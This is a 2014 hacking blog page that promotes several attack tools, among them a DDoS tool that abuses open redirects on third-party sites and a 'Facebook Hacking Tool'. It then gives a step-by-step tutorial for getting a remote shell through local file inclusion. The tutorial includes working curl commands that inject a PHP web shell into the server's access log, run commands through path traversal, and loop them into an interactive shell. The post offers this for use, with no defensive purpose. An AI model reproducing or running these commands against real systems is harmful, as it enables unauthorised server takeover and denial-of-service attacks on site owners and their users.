Sep 23, 2014

Tools: DAWIN - Distributed Audit & Wireless Intrusion Notification


DA- WIN (pronounced DARWIN) is the evolution of wireless security scanning. Developed by a team that had a significant impact on the field of 802.11 security, it embraces the true-ism that most organisations don't like or embrace network IDS technology and so are unlikely to welcome, invest in or support an IDS implementation in a more specialised area like Wfi.
Scanning is a costly, regulatory requirement for many - Yet it often provides little security protection because it only measures the threat on 4 or 5 days a year. How many CIOs would be happy with a firewall or anti-virus that worked for 1 week in 52?  



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: UFONet - DDoS Tool

UFONet - is a tool designed to launch DDoS attacks against a target, 
using 'Open Redirect' vectors on third party web applications, like botnet.


Source:: http://ufonet.sourceforge.net/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Facebook Hacking Tool

Facebook Hacking Tool
Python - -version 2.7.3 (Windows/Linux)
IMPORTS:
Matplotlib-1.2.1 Networkx-1.8.1 Numpy-1.7.1 Pygraphviz-1.1 Simplejson-3.3.0 Mechanize-0.2.5 Other: gephi-0.8.2-beta (Graphs software)
Recomendation: Use setuptools for the dependencies
S.O: Working on Windows 7 64/32 bits Working on Kali Linux (Yeah, sucks) but probably works on the others (deprecated - read below)
Usage: python main.py 


Source: https://github.com/chinoogawa/fbht


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Sep 22, 2014

Howto: Remote Shell PHP via LFI

1. Find the LFI vulnerability in website

2. Inject web shell into log file with useragent or x-forwarded-for header or something that logger will log it.
# curl -s -A '<?php system($_GET['cmd']); ?>' 'http://target.com/' -o /dev/null
 
3.  When you can inject web shell, try use the shell with any command such as id, pwd, ls
# curl -s 'http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=id'

4. Now you're ready to get the remote shell is similar that you are directly interactive in target.com's shell.(Run this in our shell)
# while true; do read -p 'cmd>' cmd; cmd=$(php -r "echo urlencode('$cmd');"); curl -s "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=$cmd" ; done

5. Now you will browse to "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=" and send command continuously similar you are in the target.com



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.